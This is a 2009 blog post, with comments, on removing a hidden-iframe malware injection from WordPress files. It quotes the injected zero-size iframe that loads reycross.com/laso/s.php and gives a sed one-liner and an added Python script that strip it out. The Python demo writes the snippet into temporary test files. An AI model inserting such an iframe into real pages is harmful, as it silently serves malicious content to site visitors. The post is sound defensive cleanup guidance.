How to Remove reycross.com WordPress Malware

It seems that a new WordPress malware hijack is making the rounds, and we got hit. Google just issued a “this site contains malware” warning for my sites; after some quick investigation it looks like the hijack has appended a malicious <iframe> block to the end of every HTML and PHP page on the site, so now I need to clean it out.

Luckily this is just like last time, and was easy to get rid of. I hope this tip helps someone else out as well.

This time, the iframe snippet that was getting added was:

<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Luckily, I still had my old script lying around that systematically searches through all my files and strips the offending piece of crap out of them. You can use this command to do the same:

find . -type f -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross\.com\/laso\/s\.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;

Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability :(
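The one-liner above does the job on a Linux box, but it also feeds every file with a dot in its name (images, archives, the lot) through sed, and it gives you no record of what it changed. The following Python script is an added example, not part of the original post: it walks a WordPress install, only touches text files it can decode, keeps a `.bak` copy of every file it modifies, and reports how many injected iframes it removed per file, so you can see which templates were hit. The iframe host and path come from the snippet quoted in the post; the file list in `demo()` is constructed for illustration. Because it uses only the Python standard library it behaves the same on Linux, macOS and Windows.

```python
from __future__ import annotations

import re
import shutil
import tempfile
from pathlib import Path

# Pattern for the injected iframe quoted in the post. The host and path are
# anchored so unrelated iframes are left alone; attributes are matched loosely
# so whitespace or attribute-order variants of the same injection are caught.
IFRAME_RE = re.compile(
    r'<iframe\s+src="http://reycross\.com/laso/s\.php"[^>]*>\s*</iframe>',
    re.IGNORECASE,
)

# Only files WordPress serves or includes as text are rewritten; images and
# archives are skipped even though the original find '*.*' would touch them.
TEXT_SUFFIXES = {".php", ".html", ".htm", ".js", ".css", ".txt"}

# Constructed copy of the injected snippet, used only by demo().
INJECTED = ('<iframe src="http://reycross.com/laso/s.php" width=0 height=0 '
            'style="hidden" frameborder=0 marginheight=0 marginwidth=0 '
            'scrolling=no></iframe>')


def strip_iframe(text: str) -> tuple[str, int]:
    """Return the cleaned text and the number of injected iframes removed."""
    return IFRAME_RE.subn("", text)


def clean_file(path: Path, backup: bool = True) -> int:
    """Remove injected iframes from one file; returns the count removed (0 = untouched)."""
    raw = path.read_bytes()
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return 0  # binary or non-UTF-8 content: never rewrite it
    cleaned, n = strip_iframe(text)
    if n:
        if backup:
            # Keep the original next to the file so a bad match can be undone.
            shutil.copy2(path, path.with_name(path.name + ".bak"))
        path.write_text(cleaned, encoding="utf-8")
    return n


def clean_tree(root: Path, backup: bool = True) -> dict[str, int]:
    """Walk a WordPress install; returns {relative path: iframes removed} for changed files."""
    report: dict[str, int] = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in TEXT_SUFFIXES:
            n = clean_file(p, backup)
            if n:
                report[p.relative_to(root).as_posix()] = n
    return report


def demo() -> dict[str, int]:
    """Build a constructed mini WordPress tree in a temp dir, clean it, return the report."""
    root = Path(tempfile.mkdtemp())
    theme = root / "wp-content" / "themes" / "demo"
    theme.mkdir(parents=True)
    (root / "index.php").write_text("<?php echo 'hi'; ?>\n" + INJECTED + "\n", encoding="utf-8")
    (theme / "footer.php").write_text("</body></html>\n" + INJECTED + INJECTED, encoding="utf-8")
    (root / "readme.txt").write_text("clean file, nothing to remove\n", encoding="utf-8")
    # A binary file containing the marker must be left alone.
    (root / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + INJECTED.encode())
    report = clean_tree(root)
    shutil.rmtree(root)
    return report


if __name__ == "__main__":
    for rel, count in demo().items():
        print(f"{rel}: removed {count} iframe(s)")
```

Run it from the root of the install as `clean_tree(Path("."))` once the demo output looks right; the `.bak` files can be deleted after you have confirmed the site renders cleanly. Note that cleaning the files is only the last step: the injected iframe came in through some writable path (the post suspects a theme), so the file timestamps and web server logs around the infection time are the place to look for how it got there.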


About Riyad Kalla

Software development, video games, writing, reading and anything shiny. I ultimately just want to provide a resource that helps people and if I can't do that, then at least make them laugh.


10 Responses to “How to Remove reycross.com WordPress Malware”

  1. Codrut Turcanu December 21, 2009 at 1:04 pm #

    Hey, I’m having similar problems… my RSS feed link got infected too

    Any idea how to remove that too?

    Also where and how do I include this text? [I'm not a tech guy]

    find . -name '*.*' -exec sed -i 's///g' {} \;

    Thank you

    • Riyad Kalla December 27, 2009 at 3:31 pm #

      Codrut,

      I’m not sure which part of WordPress generates the RSS feed content, so I’m not sure where to look to clear that out — but you execute that line of code I provided from a Unix/Linux command line from the root directory of where your wordpress install lives — it will scan *every* file looking for the pattern of the injected infected content and replace it with nothing — effectively removing it.

      It should clean it out from wherever the RSS infection is taking place as well.

  2. Jonathan Soroko December 27, 2009 at 7:00 am #

    We seem to have been hit earlier – we discovered it in older posts only. And that accidentally by looking for an old post.
    But this is helpful – seeing another variation on the problem.
    JS

    • Riyad Kalla December 27, 2009 at 3:33 pm #

      Jonathan I hope you guys got everything cleaned out OK? If you run the command given anyway, it’s more or less a no-op if there are no matching hacked scripts so it’s relatively harmless if you just wanted to run it to be safe. But if you already got things cleaned up then you should be OK.

  3. Larry Furman December 28, 2009 at 10:56 am #

    Find and sed are unix linux tools. Have you tested this in a terminal window on Mac OSX? What about windows?

  4. Larry Furman December 28, 2009 at 10:56 am #

    Find and sed are unix / linux tools. Have you tested this in a terminal window on Mac OSX? What about MS Windows?


  6. Pennsylvania Classified Ads November 11, 2012 at 11:53 pm #

    I’m sure this would help guests extremely. Will save your website for more updates! Thanks

  7. Pennsylvania Classified Ads November 11, 2012 at 11:56 pm #

    Hey Admin, Sharing unique information is quite complicated and really you’ve done the complicated job. Thanks for sharing such amazing information.

Trackbacks/Pingbacks

  1. Malware attacks on WordPress - December 27, 2009

    [...] Riyad Kalla of the blog/website Kallasoft has written one helpful post How to Remove reycross.com WordPress Malware. [...]
